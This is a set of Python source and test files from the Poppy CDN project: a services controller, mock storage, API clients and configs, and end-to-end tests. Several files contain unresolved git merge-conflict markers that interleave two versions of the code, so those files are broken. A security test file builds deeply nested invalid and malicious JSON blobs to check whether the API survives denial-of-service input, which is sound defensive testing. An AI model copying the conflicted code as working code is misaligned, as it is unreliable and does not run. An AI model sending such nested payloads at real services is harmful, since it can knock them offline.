<<<<<<< HEAD
import json
import os
import subprocess
import sys
try:
import uwsgi
use_uwsgi = True
except ImportError:
use_uwsgi = False
import jsonpatch
import jsonschema
from poppy.common import errors
from poppy.manager import base
from poppy.model import service
from poppy.openstack.common import log
from poppy.transport.validators.schemas import service as service_schema
from poppy.transport.validators.stoplight import exceptions
=======
import copy
import json
import os
import subprocess
from poppy.common import errors
from poppy.manager import base
from poppy.openstack.common import log
>>>>>>> master
LOG = log.getLogger(__name__)
class DefaultServicesController(base.ServicesController):
"""Default Services Controller."""
def __init__(self, manager):
super(DefaultServicesController, self).__init__(manager)
self.storage_controller = self._driver.storage.services_controller
self.flavor_controller = self._driver.storage.flavors_controller
self.dns_controller = self._driver.dns.services_controller
def _get_provider_details(self, project_id, service_id):
try:
provider_details = self.storage_controller.get_provider_details(
project_id,
service_id)
except Exception:
raise LookupError(u'Service {0} does not exist'.format(
service_id))
return provider_details
def list(self, project_id, marker=None, limit=None):
"""list.
:param project_id
:param marker
:param limit
:return list
"""
return self.storage_controller.list(project_id, marker, limit)
def get(self, project_id, service_id):
"""get.
:param project_id
:param service_id
:return controller
"""
return self.storage_controller.get(project_id, service_id)
def create(self, project_id, service_obj):
"""create.
:param project_id
:param service_obj
:raises LoookupError, ValueError
"""
try:
flavor = self.flavor_controller.get(service_obj.flavor_id)
# raise a lookup error if the flavor is not found
except LookupError as e:
raise e
providers = [p.provider_id for p in flavor.providers]
service_id = service_obj.service_id
try:
self.storage_controller.create(
project_id,
service_obj)
# ValueError will be raised if the service has already existed
except ValueError as e:
raise e
proxy_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'service_async_workers',
'sub_process_proxy.py')
script_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'service_async_workers',
'create_service_worker.py')
<<<<<<< HEAD
if use_uwsgi:
executable = os.path.join(uwsgi.opt['virtualenv'], 'bin', 'python')
else:
executable = sys.executable
cmd_list = [executable,
=======
cmd_list = ['python',
>>>>>>> master
proxy_path,
script_path,
json.dumps(providers),
project_id, service_id,
json.dumps(service_obj.to_dict())]
LOG.info('Starting create service subprocess: %s' % cmd_list)
<<<<<<< HEAD
p = subprocess.Popen(cmd_list, env=os.environ.copy())
=======
p = subprocess.Popen(cmd_list)
>>>>>>> master
p.communicate()
return
def update(self, project_id, service_id, service_updates):
"""update.
:param project_id
:param service_id
:param service_updates
"""
# get the current service object
service_old = self.storage_controller.get(project_id, service_id)
if service_old.status != u'deployed':
raise errors.ServiceStatusNotDeployed(
u'Service {0} not deployed'.format(service_id))
<<<<<<< HEAD
service_old_dict = service_old.to_dict()
service_obj_dict = jsonpatch.apply_patch(
service_old_dict, service_updates)
service_obj = service.Service.init_from_dict(service_obj_dict)
# validate the updates
service_obj_json = json.loads(json.dumps(service_obj.to_dict()))
del service_obj_json['status']
del service_obj_json['provider_details']
del service_obj_json['service_id']
patch_schema = service_schema.ServiceSchema.get_schema("service",
"POST")
errors_list = list(
jsonschema.Draft3Validator(patch_schema).iter_errors(
service_obj_json))
if len(errors_list) > 0:
details = dict(errors=[{
'message': '-'.join([
"[%s]" % "][".join(repr(p) for p in error.path),
str(getattr(error, "message", error))
])}
for error in errors_list])
raise exceptions.ValidationFailed(json.dumps(details))
=======
service_obj = copy.deepcopy(service_old)
# update service object
if service_updates.name:
raise Exception(u'Currently this operation is not supported')
if service_updates.domains:
service_obj.domains = service_updates.domains
if service_updates.origins:
service_obj.origins = service_updates.origins
if service_updates.caching:
raise Exception(u'Currently this operation is not supported')
if service_updates.restrictions:
raise Exception(u'Currently this operation is not supported')
if service_updates.flavor_id:
raise Exception(u'Currently this operation is not supported')
>>>>>>> master
# get provider details for this service
provider_details = self._get_provider_details(project_id, service_id)
# set status in provider details to u'update_in_progress'
for provider in provider_details:
provider_details[provider].status = u'update_in_progress'
self.storage_controller.update_provider_details(
project_id,
service_id,
provider_details)
proxy_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'service_async_workers',
'sub_process_proxy.py')
script_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'service_async_workers',
'update_service_worker.py')
<<<<<<< HEAD
if use_uwsgi:
executable = os.path.join(uwsgi.opt['virtualenv'], 'bin', 'python')
else:
executable = sys.executable
cmd_list = [executable,
=======
cmd_list = ['python',
>>>>>>> master
proxy_path,
script_path,
project_id, service_id,
json.dumps(service_old.to_dict()),
<<<<<<< HEAD
json.dumps(service_obj.to_dict())]
LOG.info('Starting update service subprocess: %s' % cmd_list)
p = subprocess.Popen(cmd_list, env=os.environ.copy())
=======
json.dumps(service_updates.to_dict()),
json.dumps(service_obj.to_dict())]
LOG.info('Starting update service subprocess: %s' % cmd_list)
p = subprocess.Popen(cmd_list)
>>>>>>> master
p.communicate()
return
def delete(self, project_id, service_id):
"""delete.
:param project_id
:param service_id
:raises LookupError
"""
provider_details = self._get_provider_details(project_id, service_id)
# change each provider detail's status to delete_in_progress
# TODO(tonytan4ever): what if this provider is in 'failed' status?
# Maybe raising a 400 error here ?
for provider in provider_details:
provider_details[provider].status = "delete_in_progress"
self.storage_controller.update_provider_details(
project_id,
service_id,
provider_details)
proxy_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'service_async_workers',
'sub_process_proxy.py')
script_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'service_async_workers',
'delete_service_worker.py')
<<<<<<< HEAD
if use_uwsgi:
executable = os.path.join(uwsgi.opt['virtualenv'], 'bin', 'python')
else:
executable = sys.executable
cmd_list = [executable,
=======
cmd_list = ["python",
>>>>>>> master
proxy_path,
script_path,
json.dumps(dict([(k, v.to_dict())
for k, v in provider_details.items()])),
project_id, service_id]
LOG.info('Starting delete service subprocess: %s' % cmd_list)
<<<<<<< HEAD
p = subprocess.Popen(cmd_list, env=os.environ.copy())
=======
p = subprocess.Popen(cmd_list)
>>>>>>> master
p.communicate()
return
def purge(self, project_id, service_id, purge_url=None):
'''If purge_url is none, all content of this service will be purge.'''
provider_details = self._get_provider_details(project_id, service_id)
# possible validation of purge url here...
proxy_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'service_async_workers',
'sub_process_proxy.py')
script_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'service_async_workers',
'purge_service_worker.py')
<<<<<<< HEAD
if use_uwsgi:
executable = os.path.join(uwsgi.opt['virtualenv'], 'bin', 'python')
else:
executable = sys.executable
cmd_list = [executable,
=======
cmd_list = ["python",
>>>>>>> master
proxy_path,
script_path,
json.dumps(dict([(k, v.to_dict())
for k, v in provider_details.items()])),
project_id, service_id,
str(purge_url)]
LOG.info('Starting purge service subprocess: %s' % cmd_list)
<<<<<<< HEAD
p = subprocess.Popen(cmd_list, env=os.environ.copy())
=======
p = subprocess.Popen(cmd_list)
>>>>>>> master
p.communicate()
return
```
#### File: model/helpers/origin.py
```python
from poppy.model import common
class Origin(common.DictSerializableModel):
"""Origin."""
def __init__(self, origin, port=80, ssl=False, rules=[]):
self._origin = origin
self._port = port
self._ssl = ssl
self._rules = rules
@property
def origin(self):
"""origin."""
return self._origin
@origin.setter
def origin(self, value):
"""origin setter."""
self._origin = value
@property
def port(self):
"""port.
:returns port
"""
return self._port
@port.setter
def port(self, value):
"""port setter."""
self._port = value
@property
def ssl(self):
"""self.
:returns ssl
"""
return self._ssl
@ssl.setter
def ssl(self, value):
"""ssl setter."""
self._ssl = value
@property
def rules(self):
"""rules.
:returns rules
"""
return self._rules
@rules.setter
def rules(self, value):
"""rules setter."""
# TODO(tonytan4ever) this field should by typed too
self._rules = value
@classmethod
def init_from_dict(cls, dict_obj):
"""Construct a model instance from a dictionary.
This serves as a 2nd constructor
:param dict_obj: dictionary object
:returns o
"""
o = cls("unnamed")
o.origin = dict_obj.get("origin", "unnamed")
o.port = dict_obj.get("port", 80)
o.ssl = dict_obj.get("ssl", False)
return o
def to_dict(self):
result = common.DictSerializableModel.to_dict(self)
# need to deserialize the nested rules object
rules_obj_list = result['rules']
result['rules'] = [r.to_dict() for r in rules_obj_list]
return result
```
#### File: storage/mockdb/services.py
```python
import json
import uuid
from poppy.model.helpers import domain
from poppy.model.helpers import origin
from poppy.model.helpers import provider_details
from poppy.model import service
from poppy.storage import base
class ServicesController(base.ServicesController):
def __init__(self, driver):
super(ServicesController, self).__init__(driver)
self.created_service_ids = []
<<<<<<< HEAD
=======
self.created_service_names = []
>>>>>>> master
@property
def session(self):
return self._driver.database
def list(self, project_id, marker=None, limit=None):
provider_details_list = {
'MaxCDN': json.dumps(
{'id': 11942,
'access_urls': [{'operator_url': 'mypullzone.netdata.com'}]}),
'Mock': json.dumps(
{'id': 73242,
'access_urls': [{'operator_url': 'mycdn.mock.com'}]}),
'CloudFront': json.dumps(
{'id': '5ABC892',
'access_urls': [{'operator_url': 'cf123.cloudcf.com'}]}),
'Fastly': json.dumps(
{'id': 3488,
'access_urls':
[{'operator_url': 'mockcf123.fastly.prod.com'}]})}
services = []
for i in self.created_service_ids:
services = [{'service_id': i,
<<<<<<< HEAD
'service_name': uuid.uuid4(),
=======
'name': i,
>>>>>>> master
'domains': [json.dumps(
{'domain': 'www.mywebsite.com'})
],
'origins': [json.dumps({'origin': 'mywebsite.com',
'port': 80,
'ssl': False})],
'flavor_id': 'standard',
'caching': [{'name': 'default',
'ttl': 3600},
{'name': 'home',
'ttl': 17200,
'rules': [
{'name': 'index',
'request_url': '/index.htm'}
]},
{'name': 'images',
'ttl': 12800,
'rules': [{'name': 'images',
'request_url': '*.png'}]}],
'restrictions': [{'name': 'website only',
'rules': [{'name': 'mywebsite.com',
'http_host':
'www.mywebsite.com'}]}],
'provider_details': provider_details_list}]
services_result = []
for r in services:
service_result = self.format_result(r)
services_result.append(service_result)
return services_result
def get(self, project_id, service_id):
# get the requested service from storage
if service_id not in self.created_service_ids:
<<<<<<< HEAD
raise ValueError("service {0} does not exist".format(service_id))
=======
raise ValueError("service: % does not exist")
>>>>>>> master
else:
origin_json = json.dumps({'origin': 'mywebsite.com',
'port': 80,
'ssl': False})
domain_json = json.dumps({'domain': 'www.mywebsite.com'})
provider_details_list = {
'MaxCDN': json.dumps(
{'id': 11942,
'access_urls': [
{'operator_url': 'mypullzone.netdata.com'}]}),
'Mock': json.dumps(
{'id': 73242,
'access_urls': [
{'operator_url': 'mycdn.mock.com'}]}),
'CloudFront': json.dumps(
{'id': '5ABC892',
'access_urls': [
{'operator_url': 'cf123.cloudcf.com'}]}),
'Fastly': json.dumps(
{'id': 3488,
'access_urls':
[{'operator_url': 'mockcf123.fastly.prod.com'}]})}
service_dict = {'service_id': service_id,
<<<<<<< HEAD
'service_name': uuid.uuid4(),
=======
'name': service_id,
>>>>>>> master
'domains': [domain_json],
'origins': [origin_json],
'flavor_id': 'standard',
'caching': [{'name': 'default',
'ttl': 3600},
{'name': 'home',
'ttl': 17200,
'rules': [
{'name': 'index',
'request_url': '/index.htm'}]},
{'name': 'images',
'ttl': 12800,
'rules': [{'name': 'images',
'request_url': '*.png'}]}],
'restrictions': [{'name': 'website only',
'rules': [
{'name': 'mywebsite.com',
'http_host':
'www.mywebsite.com'}]}],
'provider_details': provider_details_list}
service_result = self.format_result(service_dict)
return service_result
def create(self, project_id, service_obj):
if service_obj.service_id in self.created_service_ids:
raise ValueError("Service %s already exists." %
service_obj.service_id)
<<<<<<< HEAD
# TODO(amitgandhinz): append the entire service
# instead of just the name
self.created_service_ids.append(service_obj.service_id)
=======
elif service_obj.name in self.created_service_names:
raise ValueError("Service %s already exists." % service_obj.name)
else:
# TODO(amitgandhinz): append the entire service
# instead of just the name
self.created_service_ids.append(service_obj.service_id)
self.created_service_names.append(service_obj.name)
>>>>>>> master
def update(self, project_id, service_id, service_json):
# update configuration in storage
return ''
def delete(self, project_id, service_id):
if (service_id in self.created_service_ids):
self.created_service_ids.remove(service_id)
def get_provider_details(self, project_id, service_id):
if service_id not in self.created_service_ids:
raise ValueError("service: % does not exist")
else:
return {
'MaxCDN': provider_details.ProviderDetail(
provider_service_id=11942,
name='my_service_name',
access_urls=['my_service_name'
'.mycompanyalias.netdna-cdn.com']),
'Fastly': provider_details.ProviderDetail(
provider_service_id=3488,
name="my_service_name",
access_urls=['my_service_name'
'.global.prod.fastly.net']),
'CloudFront': provider_details.ProviderDetail(
provider_service_id=5892,
access_urls=['my_service_name'
'.gibberish.amzcf.com']),
'Mock': provider_details.ProviderDetail(
provider_service_id="73242",
access_urls=['my_service_name.mock.com'])}
def update_provider_details(self, project_id, service_name,
provider_details):
pass
@staticmethod
def format_result(result):
service_id = result.get('service_id')
<<<<<<< HEAD
name = str(result.get('service_name'))
=======
name = result.get('service_name')
>>>>>>> master
origins = [json.loads(o) for o in result.get('origins', [])]
domains = [json.loads(d) for d in result.get('domains', [])]
origins = [origin.Origin(o['origin'],
o.get('port', 80),
o.get('ssl', False))
for o in origins]
domains = [domain.Domain(d['domain']) for d in domains]
flavor_id = result.get('flavor_id')
s = service.Service(service_id, name, domains, origins, flavor_id)
provider_detail_results = result.get('provider_details') or {}
provider_details_dict = {}
for provider_name in provider_detail_results:
provider_detail_dict = json.loads(
provider_detail_results[provider_name])
provider_service_id = provider_detail_dict.get('id', None)
access_urls = provider_detail_dict.get('access_urls', [])
status = provider_detail_dict.get('status', u'unknown')
provider_detail_obj = provider_details.ProviderDetail(
provider_service_id=provider_service_id,
access_urls=access_urls,
status=status)
provider_details_dict[provider_name] = provider_detail_obj
s.provider_details = provider_details_dict
return s
```
#### File: poppy/transport/base.py
```python
import abc
import six
@six.add_metaclass(abc.ABCMeta)
class TransportDriverBase(object):
"""Base class for Transport Drivers to document the expected interface.
:param conf: configuration instance
:type conf: oslo.config.cfg.CONF
"""
def __init__(self, conf, manager):
self._conf = conf
self._manager = manager
self._app = None
@property
def app(self):
"""Get app.
:returns app
"""
return self._app
@property
def conf(self):
"""Get conf.
:returns conf
"""
return self._conf
@property
def manager(self):
"""Get manager
:returns manager
"""
return self._manager
@abc.abstractmethod
def listen(self):
"""Start listening for client requests (self-hosting mode).
:raises NotImplementedError
"""
raise NotImplementedError
```
#### File: transport/validators/schema_base.py
```python
from poppy.common import errors
from poppy.openstack.common.gettextutils import _
class SchemaBase(object):
schema = {}
@classmethod
def get_schema(cls, resource_name, operation):
"""Returns the schema for an operation
:param resource_name: Operation for which resource need
to be validated.
:type operation: `six.text_type`
:param operation: Operation for which params need
to be validated.
:type operation: `six.text_type`
:returns: Operation's schema
:rtype: dict
:raises: `errors.InvalidResource` if the resource
does not exist and `errors.InvalidOperation` if the operation
does not exist
"""
try:
resource_schemas = cls.schema[resource_name]
except KeyError:
# TODO(tonytan4ever): gettext support
msg = _('{0} is not a valid resource name').format(resource_name)
raise errors.InvalidResourceName(msg)
try:
return resource_schemas[operation]
except KeyError:
# TODO(tonytan4ever): gettext support
msg = _('{0} is not a valid operation for resource: {1}').format(
operation,
resource_name)
raise errors.InvalidOperation(msg)
```
#### File: api/assets/test_assets.py
```python
import uuid
import ddt
from nose.plugins import attrib
from tests.api import base
@ddt.ddt
class TestAssets(base.TestBase):
"""Tests for Assets."""
def _create_test_service(self):
service_name = str(uuid.uuid1())
self.domain_list = [{"domain": str(uuid.uuid1()) + '.com'}]
self.origin_list = [{"origin": str(uuid.uuid1()) + '.com',
"port": 443, "ssl": False}]
self.caching_list = [{"name": "default", "ttl": 3600},
{"name": "home", "ttl": 1200,
"rules": [{"name": "index",
"request_url": "/index.htm"}]}]
self.client.create_service(service_name=service_name,
domain_list=self.domain_list,
origin_list=self.origin_list,
caching_list=self.caching_list,
flavor_id=self.flavor_id)
return service_name
def setUp(self):
super(TestAssets, self).setUp()
self.service_name = str(uuid.uuid1())
self.flavor_id = self.test_config.default_flavor
if self.test_config.generate_flavors:
# create the flavor
self.flavor_id = str(uuid.uuid1())
self.client.create_flavor(flavor_id=self.flavor_id,
provider_list=[{
"provider": "fastly",
"links": [{"href": "www.fastly.com",
"rel": "provider_url"}]}])
self.service_name = self._create_test_service()
@attrib.attr('smoke')
@ddt.data('True', 'true', 'TRUE', 'TRue')
def test_purge_assets_all(self, purge_all):
url_param = {'all': purge_all}
resp = self.client.purge_assets(service_name=self.service_name,
param=url_param)
self.assertEqual(resp.status_code, 202)
@attrib.attr('smoke')
@ddt.data('mywebiste.com', 'images/maakri.jpg')
def test_purge_assets_url(self, url):
url_param = {'url': url}
resp = self.client.purge_assets(service_name=self.service_name,
param=url_param)
self.assertEqual(resp.status_code, 202)
@attrib.attr('smoke')
def test_purge_assets_negative(self):
url_param = {'url': 'myurl.com', 'all': True}
resp = self.client.purge_assets(service_name=self.service_name,
param=url_param)
self.assertEqual(resp.status_code, 400)
def tearDown(self):
self.client.delete_service(service_name=self.service_name)
if self.test_config.generate_flavors:
self.client.delete_flavor(flavor_id=self.flavor_id)
super(TestAssets, self).tearDown()
```
#### File: api/utils/client.py
```python
import json
import time
from cafe.engine.http import client
from tests.api.utils.models import requests
class AuthClient(client.HTTPClient):
"""Client Objects for Auth call."""
def __init__(self):
super(AuthClient, self).__init__()
self.default_headers['Content-Type'] = 'application/json'
self.default_headers['Accept'] = 'application/json'
def authenticate_user(self, auth_url, user_name, api_key):
"""Get Auth Token & Project ID using api_key
TODO (malini-kamalambal): Support getting token with password (or)
api key.
"""
request_body = {
"auth": {
"RAX-KSKEY:apiKeyCredentials": {
"username": user_name,
"apiKey": api_key
},
},
}
request_body = json.dumps(request_body)
url = auth_url + '/tokens'
response = self.request('POST', url, data=request_body)
token = response.json()['access']['token']['id']
project_id = response.json()['access']['token']['tenant']['id']
return token, project_id
class PoppyClient(client.AutoMarshallingHTTPClient):
"""Client objects for all the Poppy api calls."""
def __init__(self, url, auth_token, project_id, serialize_format="json",
deserialize_format="json"):
super(PoppyClient, self).__init__(serialize_format,
deserialize_format)
self.url = url
self.auth_token = auth_token
self.project_id = project_id
self.default_headers['X-Auth-Token'] = auth_token
self.default_headers['X-Project-Id'] = project_id
self.default_headers['Content-Type'] = 'application/json'
self.serialize = serialize_format
self.deserialize_format = deserialize_format
def create_service(self, service_name=None,
domain_list=None, origin_list=None,
caching_list=None, restrictions_list=None,
requestslib_kwargs=None,
flavor_id=None):
"""Creates Service
:return: Response Object containing response code 200 and body with
details of service
PUT
services/{service_name}
"""
url = '{0}/services'.format(self.url)
request_object = requests.CreateService(
service_name=service_name,
domain_list=domain_list,
origin_list=origin_list,
caching_list=caching_list,
restrictions_list=restrictions_list,
flavor_id=flavor_id)
return self.request('POST', url, request_entity=request_object,
requestslib_kwargs=requestslib_kwargs)
def patch_service(self, location, request_body=None,
requestslib_kwargs=None):
"""Updates Service
:return: Response code 202 with location header
PATCH
services/{service_name}
"""
request_object = requests.PatchService(request_body=request_body)
return self.request('PATCH', location, request_entity=request_object,
requestslib_kwargs=requestslib_kwargs)
def get_service(self, location=None, requestslib_kwargs=None):
"""Get Service
:return: Response Object containing response code 200 and body with
details of service
GET
services/{service_id}
"""
return self.request('GET', location,
requestslib_kwargs=requestslib_kwargs)
def list_services(self, param=None, requestslib_kwargs=None):
"""Get a list of Services
:return: Response Object containing response code 200 and body with
list of services & details
GET
services
"""
url = '{0}/services'.format(self.url)
return self.request('GET', url, params=param,
requestslib_kwargs=requestslib_kwargs)
def delete_service(self, location, requestslib_kwargs=None):
"""Delete Service
:return: Response Object containing response code 204
DELETE
services/{service_id}
"""
return self.request('DELETE', location,
requestslib_kwargs=requestslib_kwargs)
def check_health(self):
"""Check Health of the application
:return: Response Object containing response code 204
GET
health
"""
url = '{0}/health'.format(self.url)
return self.request('GET', url)
def ping(self):
"""Ping the server
:return: Response Object containing response code 204
GET
ping
"""
url = '{0}/ping'.format(self.url)
return self.request('GET', url)
def create_flavor(self, flavor_id=None, provider_list=None, limits=None,
requestslib_kwargs=None):
"""Create flavor
:return: Response Object containing response code 204 and header with
Location
PUT
flavors/{flavor_id}
"""
url = '{0}/flavors'.format(self.url)
request_object = requests.CreateFlavor(
flavor_id=flavor_id,
provider_list=provider_list,
limits=limits)
return self.request('POST', url,
request_entity=request_object,
requestslib_kwargs=requestslib_kwargs)
def get_flavor(self, flavor_location=None, flavor_id=None):
"""Get Flavor
:return: Response Object containing response code 200 and body with
details of flavor
GET
flavors/{flavor_id}
"""
if flavor_location:
url = flavor_location
else:
url = '{0}/flavors/{1}'.format(self.url, flavor_id)
return self.request('GET', url)
def delete_flavor(self, flavor_location=None, flavor_id=None):
"""Delete Flavor
:return: Response Object containing response code 204
DELETE
flavors/{flavor_id}
"""
if flavor_location:
url = flavor_location
else:
url = u'{0}/flavors/{1}'.format(self.url, flavor_id)
return self.request('DELETE', url)
def wait_for_service_status(self, location, status, retry_interval=2,
retry_timeout=30):
"""Waits for a service to reach a given status."""
current_status = ''
start_time = int(time.time())
stop_time = start_time + retry_timeout
while current_status != status:
time.sleep(retry_interval)
service = self.get_service(location=location)
body = service.json()
current_status = body['status']
if (current_status == status):
return
current_time = int(time.time())
if current_time > stop_time:
return
```
#### File: api/utils/config.py
```python
import json
from cafe.engine.models import data_interfaces
class PoppyConfig(data_interfaces.ConfigSectionInterface):
"""Defines the config values for poppy."""
SECTION_NAME = 'poppy'
@property
def base_url(self):
"""poppy endpoint."""
return self.get('base_url')
@property
def flavor(self):
"""poppy flavor definitions."""
return json.loads(self.get('flavor'))
class TestConfig(data_interfaces.ConfigSectionInterface):
"""Defines the config values specific to test execution."""
SECTION_NAME = 'test_configuration'
@property
def provider_validation(self):
"""Boolean value indicating if tests verify provider side details."""
return self.get_boolean('provider_validation')
@property
def status_check_retry_interval(self):
"""Int value to set retry intervals for status check."""
return int(self.get('status_check_retry_interval'))
@property
def status_check_retry_timeout(self):
"""Int value to set timeout for status check."""
return int(self.get('status_check_retry_timeout'))
@property
def generate_flavors(self):
"""Boolean value to create unique flavors in tests."""
return self.get_boolean('generate_flavors')
@property
def default_flavor(self):
"""String value to set the default flavor to use in tests."""
return self.get('default_flavor')
@property
def project_id_in_url(self):
"""Flag to indicate if project_id should be present in the url."""
return self.get_boolean('project_id_in_url')
class AuthConfig(data_interfaces.ConfigSectionInterface):
"""Defines the auth config values."""
SECTION_NAME = 'auth'
@property
def auth_enabled(self):
"""Auth On/Off."""
return self.get_boolean('auth_enabled')
@property
def base_url(self):
"""Auth endpoint."""
return self.get('base_url')
@property
def user_name(self):
"""The name of the user, if applicable."""
return self.get('user_name')
@property
def api_key(self):
"""The user's api key, if applicable."""
return self.get_raw('api_key')
@property
def multi_user(self):
"""Flag to indicate if the tests need multiple accounts."""
return self.get_boolean('multi_user')
@property
def alt_user_name(self):
"""The name of the alternate user, if applicable."""
return self.get('alt_user_name')
@property
def alt_api_key(self):
"""The alternate user's api key, if applicable."""
return self.get_raw('alt_api_key')
class FastlyConfig(data_interfaces.ConfigSectionInterface):
"""Defines the fastly config values."""
SECTION_NAME = 'fastly'
@property
def api_key(self):
"""Fastly API Key."""
return self.get('api_key')
@property
def email(self):
"""Email id associated with Fastly account."""
return self.get('email')
@property
def password(self):
"""Fastly password."""
return self.get('password')
```
#### File: tests/endtoend/base.py
```python
import BeautifulSoup
from cafe.drivers.unittest import fixtures
import requests
from tests.api.utils import client
from tests.endtoend.utils import config
from tests.endtoend.utils import heatclient
from tests.endtoend.utils import wptclient
class TestBase(fixtures.BaseTestFixture):
"""Base class for End To End CDN Tests
The tests do the following,
1. Spins up a wordpress site on a cloud server.
2. Create a Poppy service via API call using the origin & domain
feom Step 1.
3. Measures the pageload performance of the CDN enabled website.
"""
@classmethod
def setUpClass(cls):
super(TestBase, cls).setUpClass()
cls.auth_config = config.AuthConfig()
cls.auth_client = client.AuthClient()
auth_token, project_id = cls.auth_client.authenticate_user(
cls.auth_config.base_url,
cls.auth_config.user_name,
cls.auth_config.api_key)
cls.poppy_config = config.PoppyConfig()
cls.url = cls.poppy_config.base_url
cls.poppy_client = client.PoppyClient(
cls.url, auth_token, project_id,
serialize_format='json',
deserialize_format='json')
cls.test_config = config.TestConfig()
cls.heat_config = config.OrchestrationConfig()
heat_url = cls.heat_config.base_url + '/' + project_id
cls.heat_client = heatclient.HeatClient(heat_url=heat_url,
token=auth_token)
cls.wpt_config = config.WebPageTestConfig()
cls.wpt_client = wptclient.WebpageTestClient(
wpt_url=cls.wpt_config.base_url, api_key=cls.wpt_config.api_key)
def get_content(self, url):
"""Get content from the url
:param url: url to get content from
:returns: content fetched from the url
"""
response = requests.get(url)
content = BeautifulSoup.BeautifulSoup(response.text)
return content.findAll()
def assertSameContent(self, origin_url, access_url):
"""Asserts that the origin & access_url serve the same content
:param origin: Origin website
:param access_url: CDN enabled url of the origin website
:returns: True/False
"""
origin_content = self.get_content(url=origin_url)
cdn_content = self.get_content(url=access_url)
self.assertEqual(origin_content, cdn_content)
@classmethod
def tearDownClass(cls):
"""Deletes the added resources."""
super(TestBase, cls).tearDownClass()
```
#### File: tests/endtoend/test_cdn_website.py
```python
import random
import string
import uuid
from tests.endtoend import base
class TestWebsiteCDN(base.TestBase):
"""Tests for CDN enabling a website."""
def setUp(self):
super(TestWebsiteCDN, self).setUp()
def _random_string(length=12):
return ''.join([random.choice(string.ascii_letters)
for _ in range(length)])
self.stack_name = _random_string()
self.domain_name = 'TestCDN-' + _random_string() + '.org'
# Deploys a test website to a cloud server
self.heat_client.create_stack(yaml_path=self.heat_config.yaml_path,
stack_name=self.stack_name,
domain_name=self.domain_name)
print('Stack Name', self.stack_name)
print('Domain Name', self.domain_name)
self.heat_client.wait_for_stack_status(stack_name=self.stack_name)
self.origin = self.heat_client.get_server_ip(
stack_name=self.stack_name)
print('Origin', self.origin)
def test_enable_cdn(self):
# Create a Poppy Service for the test website
domain_list = [{"domain": self.domain_name}]
origin_list = [{"origin": self.origin,
"port": 80,
"ssl": False}]
caching_list = []
self.service_name = str(uuid.uuid1())
resp = self.poppy_client.create_service(
service_name=self.service_name,
domain_list=domain_list,
origin_list=origin_list,
caching_list=caching_list,
flavor_id=self.poppy_config.flavor)
self.assertEqual(resp.status_code, 202)
self.poppy_client.wait_for_service_status(
service_name=self.service_name,
status='DEPLOYED')
resp = self.poppy_client.get_service(service_name=self.service_name)
links = resp.json()['links']
access_url = [link['href'] for link in links if
link['rel'] == 'access_url']
access_url = 'http://' + access_url[0]
origin_url = 'http://' + self.origin
self.assertSameContent(origin_url=origin_url, access_url=access_url)
# Benchmark page load metrics for the CDN enabled website
wpt_test_results = {}
for location in self.wpt_config.test_locations:
wpt_test_url = self.wpt_client.start_test(access_url=access_url,
test_location=location,
runs=2)
wpt_test_results[location] = wpt_test_url
'''self.wpt_client.wait_for_test_status(status='COMPLETE',
test_url=wpt_test_url)
wpt_test_results[location] = self.wpt_client.get_test_details(
test_url=wpt_test_url)
'''
print(wpt_test_results)
def tearDown(self):
self.heat_client.delete_stack(stack_name=self.stack_name)
self.poppy_client.delete_service(service_name=self.service_name)
super(TestWebsiteCDN, self).tearDown()
```
#### File: security/flavors/test_dos_flavors.py
```python
import uuid
import ddt
import gzip
import StringIO
from nose.plugins import attrib
from tests.api import providers
@ddt.ddt
class TestDOSCreateFlavor(providers.TestProviderBase):
"""Security Tests for Denial of Service vulnerablities
for creating Flavor."""
def setUp(self):
"""
Setup for the tests
"""
super(TestDOSCreateFlavor, self).setUp()
self.reset_defaults()
self.MAX_ATTEMPTS = 30
def reset_defaults(self):
"""
Reset provider_list, limit_list
and flavor_id to its default values.
"""
self.provider_list = [{"provider": "fastly",
"links": [{"href": "www.watermelon.com",
"rel": "provider_url"}]}]
self.limits_list = [{"origins": {"min": 1, "max": 5}},
{"domains": {"min": 1, "max": 5}},
{"caching": {"min": 3600,
"max": 604800, "incr": 300}}]
self.flavor_id = str(uuid.uuid1())
def create_invalid_json(self, length):
"""
Create invalid_json like [[[[[[[[[[[[[test]]]]]]]]]]]]]
"""
str = ""
str += "[" * length
str += "\"test\""
str += "]" * length
return str
def create_malicious_json(self, length):
"""
Create malicious json like {{{{t:{{{{{}}}}}}}}}
"""
str = "{"
for k in range(0, length):
str += "\"t%s\":{" % k
str += "\"t\":\"t\""
for k in range(0, length):
str += "}"
str += "}"
return str
def data_zip(self, data):
"""
zip the data using gzip format
"""
stringio = StringIO.StringIO()
gzip_file = gzip.GzipFile(fileobj=stringio, mode='wb')
gzip_file.write(data)
gzip_file.close()
return stringio.getvalue()
def check_one_request(self):
"""
Check the response of one request to see whether request can
kill the application.
"""
resp = self.client.create_flavor(flavor_id=self.flavor_id,
provider_list=self.provider_list,
limits=self.limits_list)
# delete the flavor
self.assertTrue(resp.status_code < 503)
self.client.delete_flavor(flavor_id=self.flavor_id)
@attrib.attr('security')
def test_invalid_json_create_flavor(self):
"""
Check whether it is possible to kill the application by
creating a big invalid json blob.
"""
# create a payload with invalid json blob
attack_string = self.create_invalid_json(2500)
kwargs = {"data": attack_string}
print kwargs
resp = self.client.create_flavor(flavor_id=self.flavor_id,
provider_list=self.provider_list,
limits=self.limits_list,
requestslib_kwargs=kwargs)
self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_malicious_json_create_flavor(self):
"""
Check whether it is possible to kill the application by
creating a big malicious json blob.
"""
# create a payload with malicous json blob
attack_string = self.create_malicious_json(900)
headers = {"X-Auth-Token": self.client.auth_token,
"X-Project-Id": self.client.project_id}
kwargs = {"headers": headers, "data": attack_string}
resp = self.client.create_flavor(flavor_id=self.flavor_id,
provider_list=self.provider_list,
limits=self.limits_list,
requestslib_kwargs=kwargs)
self.assertTrue(resp.status_code < 503)
@attrib.attr('security')
def test_malicious_json_utf_8_create_flavor(self):
"""
Check whether it is possible to kill the application by
creating a big malicious json blob with utf-8 encoding.
"""
# create a payload with malicious json blob
attack_string = self.create_malicious_json(800)
headers = {"X-Auth-Token": self.client.auth_token,
"X-Project-Id": self.client.project_id}
